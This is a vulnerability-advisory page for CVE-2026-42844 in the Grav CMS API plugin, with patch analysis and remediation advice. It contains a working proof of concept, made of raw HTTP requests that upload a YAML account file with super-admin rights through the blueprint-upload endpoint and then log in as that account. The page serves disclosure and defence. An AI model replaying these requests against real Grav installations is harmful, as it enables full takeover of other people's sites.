Skip to main content

Grav CMS CVE-2026-42844

HIGH
Improper Privilege Management (CWE-269)
2026-05-06 https://github.com/getgrav/grav GHSA-6xx2-m8wv-756h
8.7
CVSS 4.0 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.7 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

5
Re-analysis Queued
May 12, 2026 - 22:22 vuln.today
cvss_changed
CVSS changed
May 12, 2026 - 22:22 NVD
8.7 (HIGH)
Source Code Evidence Fetched
May 06, 2026 - 22:02 vuln.today
Analysis Generated
May 06, 2026 - 22:02 vuln.today
CVE Published
May 06, 2026 - 21:19 nvd
HIGH

DescriptionGitHub Advisory

Summary

In Grav 2.0.0-beta.2, a low-privileged authenticated API user with api.media.write can abuse /api/v1/blueprint-upload to write an arbitrary YAML file into user/accounts/, then log in as the newly created account with api.super privileges.

This results in full administrative compromise of the Grav API.

Details

The vulnerability is located in the API plugin's blueprint upload flow:

  • user/plugins/api/classes/Api/ApiRouter.php:261
  • user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:32-45
  • user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:102-114
  • user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:271-308
  • user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:407-417
  • user/plugins/api/classes/Api/Controllers/AuthController.php:41-55

The issue exists because /api/v1/blueprint-upload accepts caller-controlled destination and scope values and uses them to resolve the final filesystem write target.

When the request uses:

  • destination=self@:
  • scope=users/anything

The server resolves the write target to the shared account directory:

text
user/accounts/

The upload handler then writes the supplied file directly into that directory and does not block YAML account files. Because Grav accepts account YAML files and supports a plaintext password: field on first login, an attacker can create a fully functional administrator account with api.super.

The required attacker privilege is low:

yaml
access:
  api:
    access: true
    media:
      write: true

PoC

Step 1: Authenticate as the low-privileged API user

http
POST /api/v1/auth/token HTTP/1.1
Host: 127.0.0.1:8123
Content-Type: application/json
Connection: close

{"username":"uploader","password":"Upload123A"}

Extract:

text
UPLOADER_TOKEN = <access_token from response>

Attachment:

<img width="1480" height="825" alt="login-uploader" src="https://github.com/user-attachments/assets/5aeda840-4a37-4365-8e46-caec88066541" />

Step 2: Upload a malicious account YAML file

http
POST /api/v1/blueprint-upload HTTP/1.1
Host: 127.0.0.1:8123
X-API-Token: <UPLOADER_TOKEN>
Content-Type: multipart/form-data; boundary=----CodexBoundaryF01
Connection: close

------CodexBoundaryF01
Content-Disposition: form-data; name="destination"

self@:
------CodexBoundaryF01
Content-Disposition: form-data; name="scope"

users/anything
------CodexBoundaryF01
Content-Disposition: form-data; name="file"; filename="pwned.yaml"
Content-Type: text/yaml

email: attacker@example.com
fullname: attacker
title: Site Administrator
state: enabled
password: Passw0rd!123
access:
  site:
    login: true
  api:
    super: true
------CodexBoundaryF01--

Expected result:

json
{
  "data": [
    {
      "name": "pwned.yaml",
      "path": "user/accounts/pwned.yaml"
    }
  ]
}

Attachment:

<img width="1484" height="797" alt="upload" src="https://github.com/user-attachments/assets/0b24c03f-cac5-4b4d-840c-52ac0840969f" />

Step 3: Log in as the newly created account

http
POST /api/v1/auth/token HTTP/1.1
Host: 127.0.0.1:8123
Content-Type: application/json
Connection: close

{"username":"pwned","password":"Passw0rd!123"}

Expected result:

json
{
  "data": {
    "user": {
      "username": "pwned",
      "super_admin": true
    }
  }
}

Attachment:

<img width="1494" height="830" alt="pwned-login" src="https://github.com/user-attachments/assets/7a1ab7fc-d3fb-4077-9b61-09cd947241fe" />

Step 4: Verify privileged API access

http
GET /api/v1/system/info HTTP/1.1
Host: 127.0.0.1:8123
X-API-Token: <PWNED_TOKEN>
Connection: close

Expected result:

The request succeeds and returns system-level information.

Attachment:

<img width="1480" height="831" alt="system-info" src="https://github.com/user-attachments/assets/31677d61-3dbd-4ea6-9fbe-80799a628cc2" />

Impact

This is an authenticated vertical privilege-escalation vulnerability.

Any API user with basic media upload capability can escalate directly to a full API super administrator by planting a new account YAML file. Once api.super access is obtained, the attacker gains full control over the CMS management API and can:

  • modify content
  • alter configuration
  • manage users
  • install or update plugins/themes
  • access system-level administration features

In a real deployment, this level of control is sufficient for complete CMS compromise and may be chained into server-side code execution depending on enabled plugins, writable template paths, or package-management workflow.

This issue was reproduced locally:

  • the upload response returned user/accounts/pwned.yaml
  • logging in as pwned succeeded
  • the new account had super_admin = true
  • privileged endpoints such as /api/v1/system/info were accessible

AnalysisAI

Privilege escalation in Grav CMS 2.0.0-beta.2 allows authenticated API users with minimal media.write permissions to fabricate super-admin accounts via arbitrary YAML file upload. The /api/v1/blueprint-upload endpoint accepts attacker-controlled destination and scope parameters that, when combined with specific values (destination=self@: and scope=users/anything), write files directly into user/accounts/. Because Grav parses YAML files in this directory as authoritative user accounts and accepts plaintext passwords on first login, attackers craft a new account with api.super privileges, then authenticate as that account to gain full administrative control. Publicly available exploit code exists (detailed PoC in vendor advisory). Vendor-released patch restricts accounts directory uploads to image-only extensions and blocks config-bearing file types (YAML, JSON, Twig) across all blueprint-upload targets.

Technical ContextAI

Grav is a PHP-based flat-file CMS that stores user accounts as YAML files in user/accounts/, parsed at runtime as authoritative credential and permission data. The vulnerability affects the API plugin's BlueprintUploadController (pkg:composer/getgrav_grav < 2.0.0-beta.4), which routes file uploads through a stream locator pattern. The flaw is a path-traversal variant (CWE-269: Improper Privilege Management) where caller-controlled destination and scope parameters are concatenated without validating the resolved filesystem target against security boundaries. When scope=users/anything is combined with destination=self@:, the locator resolves to user/accounts/ instead of a scoped media directory. The endpoint lacks extension-based ACLs for this directory, so .yaml files are written alongside legitimate avatar images. Grav's account subsystem then reads any YAML file matching username.yaml as a valid account definition, including plaintext password and access.api.super fields. The commit diff shows the fix adds three controls: pre-locator traversal detection (assertSafeDestination rejecting ../segments and null bytes), post-resolution directory classification (classifyTargetDir identifying user/accounts/), and an image-only extension allowlist (ACCOUNTS_IMAGE_EXTENSIONS=[jpg,jpeg,png,gif,webp,svg,avif,bmp,ico]) enforced via guardConfigBearingTarget. Additionally, a global denylist (FORBIDDEN_EXTENSIONS=[yaml,yml,json,twig,env,neon,lock]) blocks config-bearing formats across all blueprint-upload targets to prevent future locator bugs from re-introducing the attack surface in user/config/ or plugin directories.

RemediationAI

Upgrade to Grav CMS 2.0.0-beta.4 or later, which includes the fix from grav-plugin-api commit 97fc02844a35f743dfe93d34efd92d47eedd5bc5 (vendor advisory https://github.com/getgrav/grav/security/advisories/GHSA-6xx2-m8wv-756h, patch commit https://github.com/getgrav/grav-plugin-api/commit/97fc02844a35f743dfe93d34efd92d47eedd5bc5). The patch introduces three hardening layers: input validation rejecting path-traversal segments in destination parameter, directory classification identifying user/accounts/ as a protected target, and an image-only extension allowlist (jpg, jpeg, png, gif, webp, svg, avif, bmp, ico) restricting blueprint-upload writes to this directory. If immediate upgrade is not feasible, implement these compensating controls with noted trade-offs: (1) Disable the API plugin entirely via user/config/plugins/api.yaml (enabled: false) - this breaks all API integrations but eliminates the attack surface completely; (2) Audit and revoke api.media.write permissions from all API user accounts, granting only read-only access (api.media.read: true) - this prevents exploitation but disables legitimate media upload workflows via API; (3) Deploy a reverse proxy or web application firewall to block POST requests to /api/v1/blueprint-upload containing scope=users in the request body - this is fragile (bypassable via parameter encoding or alternate scope values that future locator bugs might resolve to user/accounts/) and requires regex inspection of multipart/form-data payloads. Note that generic filesystem permissions (chmod/chown on user/accounts/) do not mitigate this issue because the PHP process already requires write access to create legitimate user accounts. After patching, verify no unauthorized accounts exist by auditing user/accounts/*.yaml for unfamiliar usernames or accounts with access.api.super: true created during the vulnerability window.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-42844 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy